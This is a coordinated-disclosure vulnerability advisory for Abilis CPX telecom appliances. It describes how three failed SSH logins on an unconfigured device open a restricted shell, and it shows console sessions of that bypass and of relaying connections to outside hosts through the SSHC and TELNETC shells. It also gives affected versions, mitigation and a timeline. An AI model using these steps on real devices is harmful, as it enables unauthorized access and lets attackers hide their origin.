Products
| Product | |
| 1 | Abilis CPX series telcom appliances |
CVE
CVE-2025-35021Executive summary #
By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of CWE-1188, âInitialization of a Resource with an Insecure Default,â and is estimated to have a CVSS 3.1 score of 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant SSVC vectors for this vulnerability are Exploitation: PoC and Technical Impact: Partial.
Technical details #
A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device.
In the example console session below, three known-incorrect logins (bad) are offered to an affected device before being dropped to the SSHS prompt.
$ ssh root@[TARGET]
root@TARGET's password:
COM
Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
Login: bad
PERMISSION DENIED
Login: bad
PERMISSION DENIED
Login: bad
PERMISSION DENIED
CLR F0 AE
[192.168.11.002] SSHS>
At this point, we are in the SSHS shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the SSHC shell:
[192.168.11.002]help
CP Open connection to local CP resource
SSH Open connection to local SSH client
TELNET Open connection to local TELNET client
<CD>-<UD> Open X25 call with CD and UD
CLR Close connection
CLOSE Close SSH Session
EXIT Close SSH Session
HELP Show current help
[192.168.11.002] SSHS>SSH
[192.168.11.002] SSHC>
[192.168.11.002] SSHC>OPEN 8.8.8.8:53
Trying 8.8.8.8:53 ... Open
Version identification fault
Similar to the SSHC shell, the TELNETC shell offers another path to connection relaying, and does not require the service to handshake a particular way:
[192.168.11.002] SSHS>TELNET
[192.168.11.002] TELNETC>
[192.168.11.002]TELNETC>open 1.2.3.4:5678
Trying 1.2.3.4:5678 ... Open
Affected Products #
Affected versions of CPX devices include:
- Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
- Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
- Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
- Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
- Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
- Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
- Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
- Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
- Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0
Across these devices, affected SSH banners include:
- SSH-1.99-CPX SSH Server
- SSH-2.0-CPX SSH Server
Mitigation #
According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service.
Attacker value #
By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.
Credit #
This issue was discovered by HD Moore and disclosure was coordinated by Tod Beardsley through the AHA! CNA.
Timeline #
- 2025-08-09 (Sat): Briefly demoed at Def Con 33 in the presentation, Shaking Out Shells with SSHamble
- 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it
- 2025-08-20 (Wed): Provided technical details to the vendor
- 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue
- 2025-10-21 (Tue): Vendor released Abilis firmware update 9.0.7
- 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and CVE-2025-35021 reserved
- 2025-11-03 (Mon): This public disclosure
